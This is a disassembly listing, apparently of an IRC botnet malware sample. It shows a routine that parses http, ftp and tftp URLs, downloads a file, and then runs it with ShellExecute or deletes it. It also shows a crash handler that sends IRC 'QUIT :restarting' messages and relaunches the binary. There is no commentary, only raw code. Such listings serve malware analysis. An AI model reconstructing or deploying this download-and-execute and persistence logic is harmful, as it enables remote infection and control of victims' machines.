var_814 = qword ptr -814h
var_804 = qword ptr -804h
var_7FC = dword ptr -7FCh
var_7F8 = qword ptr -7F8h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_6D5 = byte ptr -6D5h
var_6D4 = byte ptr -6D4h
var_6CC = dword ptr -6CCh
var_6C8 = dword ptr -6C8h
var_6C4 = dword ptr -6C4h
var_6C0 = dword ptr -6C0h
var_6BC = byte ptr -6BCh
var_6BB = byte ptr -6BBh
var_63C = dword ptr -63Ch
var_638 = byte ptr -638h
var_637 = byte ptr -637h
var_632 = byte ptr -632h
var_631 = byte ptr -631h
var_534 = byte ptr -534h
var_430 = byte ptr -430h
var_2A8 = byte ptr -2A8h
var_2A7 = byte ptr -2A7h
var_2A6 = byte ptr -2A6h
var_2A3 = byte ptr -2A3h
var_296 = byte ptr -296h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = byte ptr -284h
var_283 = byte ptr -283h
var_204 = byte ptr -204h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 804h
push edi
push 3AFh
push [ebp+arg_0]
lea eax, [ebp+var_63C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_7DC]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_288], 0
mov [ebp+var_28C], 1
and [ebp+var_6CC], 0
mov al, byte_41DE30
mov [ebp+var_284], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_283]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp+var_6BC], al
push 1Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_6BB]
rep stosd
stosw
stosb
and [ebp+var_6C8], 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_4185CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 14h
push 7
push offset dword_4185C4
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_402B93
push 0
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_631]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_402B8E
call ds:dword_417064 ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_402B58
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41858C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_402B7B
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402A32+FF�j
lea eax, [ebp+var_631]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41855C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_402B7B: ; CODE XREF: sub_402A32+124�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402B8E: ; CODE XREF: sub_402A32+F4�j
jmp loc_403256
; ---------------------------------------------------------------------------
loc_402B93: ; CODE XREF: sub_402A32+D6�j
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA8: ; CODE XREF: sub_402A32:loc_402CD8�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402BB5: ; CODE XREF: sub_402A32+174�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402CDD
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 3Ah
jnz loc_402CD8
mov [ebp+var_7E0], 1
jmp short loc_402BF2
; ---------------------------------------------------------------------------
loc_402BE5: ; CODE XREF: sub_402A32:loc_402CD3�j
mov eax, [ebp+var_7E0]
inc eax
mov [ebp+var_7E0], eax
loc_402BF2: ; CODE XREF: sub_402A32+1B1�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
test eax, eax
jz short loc_402C23
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 2Fh
jnz short loc_402C7A
loc_402C23: ; CODE XREF: sub_402A32+1D6�j
mov eax, [ebp+var_7E0]
and [ebp+eax+var_6D5], 0
lea eax, [ebp+var_6D4]
push eax
call sub_40422A
pop ecx
test eax, eax
jz short loc_402C75
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
add eax, [ebp+var_7E0]
push eax
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6C8], 1
loc_402C75: ; CODE XREF: sub_402A32+20E�j
jmp loc_403251
; ---------------------------------------------------------------------------
loc_402C7A: ; CODE XREF: sub_402A32+1EF�j
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 30h
jl short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
movsx eax, [ebp+eax+var_638]
cmp eax, 39h
jg short loc_402CCE
mov eax, [ebp+var_6C0]
add eax, [ebp+var_7E0]
mov ecx, [ebp+var_7E0]
mov al, [ebp+eax+var_638]
mov [ebp+ecx+var_6D5], al
jmp short loc_402CD3
; ---------------------------------------------------------------------------
loc_402CCE: ; CODE XREF: sub_402A32+25F�j
; sub_402A32+278�j
jmp loc_40324C
; ---------------------------------------------------------------------------
loc_402CD3: ; CODE XREF: sub_402A32+29A�j
jmp loc_402BE5
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402A32+1A1�j
jmp loc_402BA8
; ---------------------------------------------------------------------------
loc_402CDD: ; CODE XREF: sub_402A32+18A�j
; sub_402A32:loc_40324C�j ...
push 7
push offset aHttp ; "http://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402D37
cmp [ebp+var_6C8], 0
jnz short loc_402D13
push offset a80 ; "80"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D13: ; CODE XREF: sub_402A32+2CC�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 1
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402A32+2C3�j
push 6
push offset aFtp ; "ftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402DB7
cmp [ebp+var_6C8], 0
jnz short loc_402D6D
push offset a21 ; "21"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402D6D: ; CODE XREF: sub_402A32+326�j
lea eax, [ebp+var_632]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 2
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_284]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset aAnonymous ; "anonymous"
lea eax, [ebp+var_6BC]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_402E3D
; ---------------------------------------------------------------------------
loc_402DB7: ; CODE XREF: sub_402A32+31D�j
push 7
push offset aTftp ; "tftp://"
lea eax, [ebp+var_638]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_402E0E
cmp [ebp+var_6C8], 0
jnz short loc_402DED
push offset a69 ; "69"
lea eax, [ebp+var_6D4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_402DED: ; CODE XREF: sub_402A32+3A6�j
lea eax, [ebp+var_631]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov [ebp+var_6CC], 3
jmp short loc_402E3D
; ---------------------------------------------------------------------------
loc_402E0E: ; CODE XREF: sub_402A32+39D�j
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_418500
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402E3D: ; CODE XREF: sub_402A32+300�j
; sub_402A32+380�j ...
lea eax, [ebp+var_638]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_6C0], eax
jmp short loc_402E5F
; ---------------------------------------------------------------------------
loc_402E52: ; CODE XREF: sub_402A32:loc_402F11�j
mov eax, [ebp+var_6C0]
dec eax
mov [ebp+var_6C0], eax
loc_402E5F: ; CODE XREF: sub_402A32+41E�j
cmp [ebp+var_6C0], 0FFFFFFFFh
jz loc_402F16
mov eax, [ebp+var_6C0]
movsx eax, [ebp+eax+var_638]
cmp eax, 40h
jnz loc_402F11
mov eax, [ebp+var_6C0]
and [ebp+eax+var_638], 0
push offset asc_4184FC ; ":"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_7E4], eax
cmp [ebp+var_7E4], 0
jz short loc_402ED8
mov eax, [ebp+var_7E4]
and byte ptr [eax], 0
push 80h
mov eax, [ebp+var_7E4]
inc eax
push eax
lea eax, [ebp+var_6BC]
push eax
call sub_407A56
add esp, 0Ch
loc_402ED8: ; CODE XREF: sub_402A32+47F�j
push 80h
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_284]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_6C0]
lea eax, [ebp+eax+var_637]
push eax
lea eax, [ebp+var_638]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_402F16
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: sub_402A32+44B�j
jmp loc_402E52
; ---------------------------------------------------------------------------
loc_402F16: ; CODE XREF: sub_402A32+434�j
; sub_402A32+4DD�j
push offset asc_4184F8 ; "/"
lea eax, [ebp+var_638]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_288], eax
cmp [ebp+var_288], 0
jnz short loc_402F67
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset unk_4184CC
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp loc_40325B
; ---------------------------------------------------------------------------
loc_402F67: ; CODE XREF: sub_402A32+504�j
mov eax, [ebp+var_288]
inc eax
push eax
lea eax, [ebp+var_204]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_288]
and byte ptr [eax], 0
lea eax, [ebp+var_638]
push eax
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp-6D8h], eax
and [ebp+var_6C4], 0
cmp [ebp+var_6CC], 1
jnz short loc_403009
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402698
add esp, 24h
mov [ebp+var_28C], eax
loc_403009: ; CODE XREF: sub_402A32+582�j
cmp [ebp+var_6CC], 2
jnz short loc_403065
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_6BC]
push eax
lea eax, [ebp+var_284]
push eax
call sub_402A24
add esp, 24h
mov [ebp+var_28C], eax
loc_403065: ; CODE XREF: sub_402A32+5DE�j
cmp [ebp+var_6CC], 3
jnz short loc_4030B3
push [ebp+var_63C]
movsx eax, [ebp+var_2A8]
neg eax
sbb eax, eax
neg eax
push eax
lea eax, [ebp+var_6C4]
push eax
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_6D4]
push eax
lea eax, [ebp+var_100]
push eax
call sub_402A2B
add esp, 1Ch
mov [ebp+var_28C], eax
loc_4030B3: ; CODE XREF: sub_402A32+63A�j
; sub_402A32:loc_403256�j
cmp [ebp+var_28C], 1
jnz loc_403219
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4030D7
mov [ebp+var_7EC], offset dword_4184C0
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_4030D7: ; CODE XREF: sub_402A32+697�j
movsx eax, [ebp+var_2A6]
test eax, eax
jz short loc_4030EE
mov [ebp+var_7F0], offset dword_4184B4
jmp short loc_4030F8
; ---------------------------------------------------------------------------
loc_4030EE: ; CODE XREF: sub_402A32+6AE�j
mov [ebp+var_7F0], offset byte_41DE30
loc_4030F8: ; CODE XREF: sub_402A32+6BA�j
mov eax, [ebp+var_7F0]
mov [ebp+var_7EC], eax
loc_403104: ; CODE XREF: sub_402A32+6A3�j
push [ebp+var_7EC]
mov eax, [ebp+var_6C4]
shr eax, 0Ah
mov dword ptr [ebp+var_7F8], eax
and dword ptr [ebp+var_7F8+4], 0
fild [ebp+var_7F8]
fstp [ebp+var_7FC]
call sub_416B64 ; clock
sub eax, [ebp-6D8h]
mov dword ptr [ebp+var_804], eax
and dword ptr [ebp+var_804+4], 0
fild [ebp+var_804]
fdiv ds:flt_417270
fdivr [ebp+var_7FC]
push ecx
push ecx
fstp [esp+814h+var_814]
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_41846C
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_2A7]
test eax, eax
jz short loc_403198
lea eax, [ebp+var_534]
push eax
call ds:dword_4170AC ; DeleteFileA
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_403198: ; CODE XREF: sub_402A32+755�j
movsx eax, [ebp+var_2A6]
test eax, eax
jnz short loc_4031AE
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_403217
loc_4031AE: ; CODE XREF: sub_402A32+76F�j
movsx eax, [ebp+var_2A3]
neg eax
sbb eax, eax
inc eax
push eax
push 0
push 0
lea eax, [ebp+var_534]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
mov [ebp+var_7E8], eax
cmp [ebp+var_7E8], 20h
jbe short loc_4031F4
movsx eax, [ebp+var_296]
test eax, eax
jz short loc_4031F2
call sub_407148
loc_4031F2: ; CODE XREF: sub_402A32+7B9�j
jmp short loc_403217
; ---------------------------------------------------------------------------
loc_4031F4: ; CODE XREF: sub_402A32+7AE�j
lea eax, [ebp+var_534]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418444
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_403217: ; CODE XREF: sub_402A32+764�j
; sub_402A32+77A�j ...
jmp short loc_40323C
; ---------------------------------------------------------------------------
loc_403219: ; CODE XREF: sub_402A32+688�j
lea eax, [ebp+var_7DC]
push eax
mov eax, [ebp+var_63C]
push dword ptr [eax]
push offset dword_418414
lea eax, [ebp+var_430]
push eax
call sub_40D53F
add esp, 10h
loc_40323C: ; CODE XREF: sub_402A32:loc_403217�j
push [ebp+var_63C]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_40325B
; ---------------------------------------------------------------------------
loc_40324C: ; CODE XREF: sub_402A32:loc_402CCE�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403251: ; CODE XREF: sub_402A32:loc_402C75�j
jmp loc_402CDD
; ---------------------------------------------------------------------------
loc_403256: ; CODE XREF: sub_402A32:loc_402B8E�j
jmp loc_4030B3
; ---------------------------------------------------------------------------
loc_40325B: ; CODE XREF: sub_402A32+157�j
; sub_402A32+406�j ...
pop edi
leave
retn 4
sub_402A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403260 proc near ; CODE XREF: sub_40A9CF+959�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_403271
jmp locret_403329
; ---------------------------------------------------------------------------
loc_403271: ; CODE XREF: sub_403260+A�j
push 3AFh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_40328A
jmp locret_403329
; ---------------------------------------------------------------------------
loc_40328A: ; CODE XREF: sub_403260+23�j
push 8
push 7Ah
push 61h
push 4
lea eax, [ebp+var_10]
push eax
call sub_410501
add esp, 14h
and [ebp+eax+var_10], 0
push offset dword_418620
lea eax, [ebp+var_10]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jnz short loc_4032BF
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_4032BF: ; CODE XREF: sub_403260+57�j
push 104h
push [ebp+arg_4]
mov eax, [ebp+var_14]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_14]
add eax, 108h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_14]
add eax, 20Ch
push eax
call sub_405F67
pop ecx
pop ecx
mov eax, [ebp+var_14]
add eax, 108h
push eax
mov eax, [ebp+var_14]
add eax, 4
push eax
push offset dword_4185FC
push 0
push [ebp+var_14]
push offset sub_402A32
call sub_4095A4
add esp, 18h
locret_403329: ; CODE XREF: sub_403260+C�j
; sub_403260+25�j
leave
retn
sub_403260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40332B proc near ; CODE XREF: sub_4093B6+A0�p
; sub_4094E6+9B�p ...
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 114h
push 1
push offset dword_41DE3C
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp dword_41DE38, 0
jz loc_4034D9
mov [ebp+var_8], offset aException_othe ; "EXCEPTION_OTHER"
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_110], eax
cmp [ebp+var_110], 0C0000025h
ja short loc_4033A4
cmp [ebp+var_110], 0C0000025h
jz short loc_4033FA
cmp [ebp+var_110], 80000003h
jz short loc_4033DF
cmp [ebp+var_110], 0C0000005h
jz short loc_4033D6
cmp [ebp+var_110], 0C000001Dh
jz short loc_4033E8
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033A4: ; CODE XREF: sub_40332B+45�j
cmp [ebp+var_110], 0C000008Dh
jb short loc_403413
cmp [ebp+var_110], 0C0000093h
jbe short loc_40340C
cmp [ebp+var_110], 0C0000094h
jz short loc_4033F1
cmp [ebp+var_110], 0C00000FDh
jz short loc_403403
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033D6: ; CODE XREF: sub_40332B+69�j
mov [ebp+var_8], offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_40332B+5D�j
mov [ebp+var_8], offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033E8: ; CODE XREF: sub_40332B+75�j
mov [ebp+var_8], offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033F1: ; CODE XREF: sub_40332B+9B�j
mov [ebp+var_8], offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_4033FA: ; CODE XREF: sub_40332B+51�j
mov [ebp+var_8], offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_403403: ; CODE XREF: sub_40332B+A7�j
mov [ebp+var_8], offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_403413
; ---------------------------------------------------------------------------
loc_40340C: ; CODE XREF: sub_40332B+8F�j
mov [ebp+var_8], offset aException_flt ; "EXCEPTION_FLT"
loc_403413: ; CODE XREF: sub_40332B+77�j
; sub_40332B+83�j ...
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_40342A
mov [ebp+var_114], offset aRestarting ; "Restarting"
jmp short loc_403434
; ---------------------------------------------------------------------------
loc_40342A: ; CODE XREF: sub_40332B+F1�j
mov [ebp+var_114], offset aContinuing ; "Continuing"
loc_403434: ; CODE XREF: sub_40332B+FD�j
push [ebp+var_114]
push [ebp+var_8]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41864C
push offset dword_41DAB4
call sub_40D4AB
add esp, 48h
loc_4034D9: ; CODE XREF: sub_40332B+21�j
mov eax, [ebp+var_4]
inc eax
cmp eax, 64h
jz short loc_4034ED
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax+4], 1
jnz short loc_403558
loc_4034ED: ; CODE XREF: sub_40332B+1B5�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jz short loc_403545
push 0
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
cmp eax, 20h
ja short loc_403538
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp short loc_403543
; ---------------------------------------------------------------------------
loc_403538: ; CODE XREF: sub_40332B+1FE�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403543: ; CODE XREF: sub_40332B+20B�j
jmp short loc_403550
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: sub_40332B+1DF�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
loc_403550: ; CODE XREF: sub_40332B:loc_403543�j
push 0
call ds:dword_41705C ; ExitProcess
loc_403558: ; CODE XREF: sub_40332B+1C0�j
mov eax, [ebp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 80000003h
jnz short loc_403583
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov eax, [eax+0B8h]
inc eax
mov ecx, [ebp+arg_0]
mov ecx, [ecx+4]
mov [ecx+0B8h], eax
or eax, 0FFFFFFFFh
jmp short locret_403586
; ---------------------------------------------------------------------------
loc_403583: ; CODE XREF: sub_40332B+238�j
push 1
pop eax
locret_403586: ; CODE XREF: sub_40332B+256�j
leave
retn
sub_40332B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403588 proc near ; DATA XREF: sub_403BD3:loc_403D85�o
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
cmp [ebp+arg_8], 0
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jz short loc_4035BB
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 2
jz short loc_4035BB
push 273Fh
call ds:dword_417234 ; WSASetLastError
mov eax, 273Fh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035BB: ; CODE XREF: sub_403588+13�j
; sub_403588+1C�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 1
jz short loc_4035E2
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 2
jz short loc_4035E2
push 273Ch
call ds:dword_417234 ; WSASetLastError
mov eax, 273Ch
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4035E2: ; CODE XREF: sub_403588+A�j
; sub_403588+3A�j ...
cmp [ebp+arg_0], 0
jnz loc_4036D6
push 30h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_40360D
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_40360D: ; CODE XREF: sub_403588+73�j
push 30h
push 0
push [ebp+var_34]
call sub_416B6A ; memset
add esp, 0Ch
push 10h
push 0
lea eax, [ebp+var_30]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_30], 2
cmp [ebp+arg_4], 0
jz short loc_40364C
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_2E], ax
loc_40364C: ; CODE XREF: sub_403588+AE�j
mov eax, [ebp+var_34]
mov dword ptr [eax+4], 2
cmp [ebp+arg_8], 0
jz short loc_403667
mov eax, [ebp+arg_8]
mov eax, [eax+8]
mov [ebp+var_38], eax
jmp short loc_40366E
; ---------------------------------------------------------------------------
loc_403667: ; CODE XREF: sub_403588+D2�j
mov [ebp+var_38], 1
loc_40366E: ; CODE XREF: sub_403588+DD�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
mov [eax+8], ecx
cmp [ebp+arg_8], 0
jz short loc_403688
mov eax, [ebp+arg_8]
mov eax, [eax+0Ch]
mov [ebp+var_3C], eax
jmp short loc_40368F
; ---------------------------------------------------------------------------
loc_403688: ; CODE XREF: sub_403588+F3�j
mov [ebp+var_3C], 6
loc_40368F: ; CODE XREF: sub_403588+FE�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_3C]
mov [eax+0Ch], ecx
mov eax, [ebp+var_34]
mov dword ptr [eax+10h], 10h
mov eax, [ebp+var_34]
add eax, 20h
mov ecx, [ebp+var_34]
mov [ecx+18h], eax
and [ebp+var_2C], 0
push 10h
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_34]
add eax, 20h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_34]
mov [eax], ecx
xor eax, eax
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036D6: ; CODE XREF: sub_403588+5E�j
push [ebp+arg_0]
call ds:dword_41723C ; gethostbyname
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4036F2
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_4036F2: ; CODE XREF: sub_403588+15E�j
and [ebp+var_20], 0
jmp short loc_4036FF
; ---------------------------------------------------------------------------
loc_4036F8: ; CODE XREF: sub_403588+18C�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4036FF: ; CODE XREF: sub_403588+16E�j
cmp [ebp+var_14], 0
jz short loc_403716
mov eax, [ebp+var_14]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_20]
cmp dword ptr [eax+ecx*4], 0
jz short loc_403716
jmp short loc_4036F8
; ---------------------------------------------------------------------------
loc_403716: ; CODE XREF: sub_403588+17B�j
; sub_403588+18A�j
cmp [ebp+var_20], 0
jnz short loc_403726
mov eax, 2AFBh
jmp locret_4038B6
; ---------------------------------------------------------------------------
loc_403726: ; CODE XREF: sub_403588+192�j
mov eax, [ebp+var_20]
imul eax, 30h
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_40374C
push 8
call ds:dword_417234 ; WSASetLastError
push 8
pop eax
jmp locret_4038B6
